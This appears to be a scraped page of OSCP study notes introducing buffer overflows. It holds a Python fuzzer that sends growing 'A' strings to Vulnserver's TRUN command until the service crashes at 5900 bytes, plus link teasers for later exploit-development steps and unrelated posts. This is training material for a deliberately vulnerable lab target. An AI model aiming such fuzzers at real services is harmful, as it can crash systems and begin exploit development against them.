Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

Immunity Debuger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Open the vulnserver program on windows os.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0..XX

3.Write the Python fuzzer test script on Kali Linux

 #!/usr/bin/python

 import socket

 import sys

 buffer=["A"]

 counter=100

 while len(buffer) <= 30:

     buffer.append("A"*counter)

     counter=counter+200

 for string in buffer:

     print "Fuzzing vulnserver with %s bytes" % len(string)

     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     connect=s.connect(('10.0.0.XX',9999))

     s.send('TRUN /.:/' + string)

     s.close()

Grant the rights to the script file and execute the fuzzer.py.

chmod  fuzzer.py
./fuzzer.py

The vulnserver crashed with 5900 bytes.

Immunity Debuger

GUI Screenshoot

Open or attach the vulnserver program.

Perform the fuzzer.py on Kali Linux.

./fuzzer.py

The vulnserver crashed finally.

OSCP Learning Notes - Buffer Overflows(1)的更多相关文章

  1. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  2. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  3. OSCP Learning Notes - Buffer Overflows(5)

    Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of K ...

  4. OSCP Learning Notes - Buffer Overflows(4)

    Finding the Right Module(mona) Mona Module Project website: https://github.com/corelan/mona 1. Downl ...

  5. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  6. OSCP Learning Notes - Exploit(3)

     Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  9. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

随机推荐

  1. 一时技痒,撸了个动态线程池,源码放Github了

    阐述背景 线程池在日常工作中用的还挺多,当需要异步,批量处理一些任务的时候我们会定义一个线程池来处理. 在使用线程池的过程中有一些问题,下面简单介绍下之前遇到的一些问题. 场景一:实现一些批量处理数据 ...

  2. vue事件修饰符与按钮修饰符

    事件修饰符:(当事件无需传参数时可直接写成以下形式,有参数时则为@click.stop="handleLiClick($event)") stop:阻止事件冒泡行为(子元素被点击, ...

  3. 基于领域驱动设计(DDD)超轻量级快速开发架构

    smartadmin.core.urf 这个项目是基于asp.net core 3.1(最新)基础上参照领域驱动设计(DDD)的理念,并参考目前最为了流行的abp架构开发的一套轻量级的快速开发web ...

  4. DNS区域传输和DNS字典爆破

    nslookup命令是已知域名的的解析记录下进行的查询.打个比方,已知sina.com这个域名有www.sina.com这条主机解析记录,就可以查询www.sina.com对应的ip以及其他相关信息. ...

  5. Shell 脚本学习(1)

    一 Shell概览 1. 自动化批量系统初始化程序(update, 软件安装,时区设置,安全策略,...) 2. 自动化批量软件部署程序(LAMP,LNMP,Tomcat,LVS,Nginx) 3. ...

  6. 入门大数据---Spark累加器与广播变量

    一.简介 在 Spark 中,提供了两种类型的共享变量:累加器 (accumulator) 与广播变量 (broadcast variable): 累加器:用来对信息进行聚合,主要用于累计计数等场景: ...

  7. 编译ts时候src目录的ts分别生成了单独的js文件

    { "compilerOptions": { "target": "es5", "outDir": "bin- ...

  8. .NET Core WEB API接口参数模型绑定

    .NET Core WEB API 模型绑定方式有以下表格中的几种: 特性 绑定源 [FromHeader] 请求标头 [FromQuery] 请求查询字符串参数 [FromForm] 请求正文中的表 ...

  9. 致Spring Boot初学者

    1.引言 Spring Boot是近两年来火的一塌糊涂,来这里的每一位同学,之前应该大致上学习了web项目开发方面的知识,正在努力成长过程中.因为最近有不少人来向我“请教”,他们大都是一些刚入门的新手 ...

  10. Oracle查询dba_extents视图很慢

    Oracle查询dba_extents视图很慢 问题描述 下边这条SQL查询每次大概要花1分钟左右,实在是比较异常. select owner,tablespace_name from dba_ext ...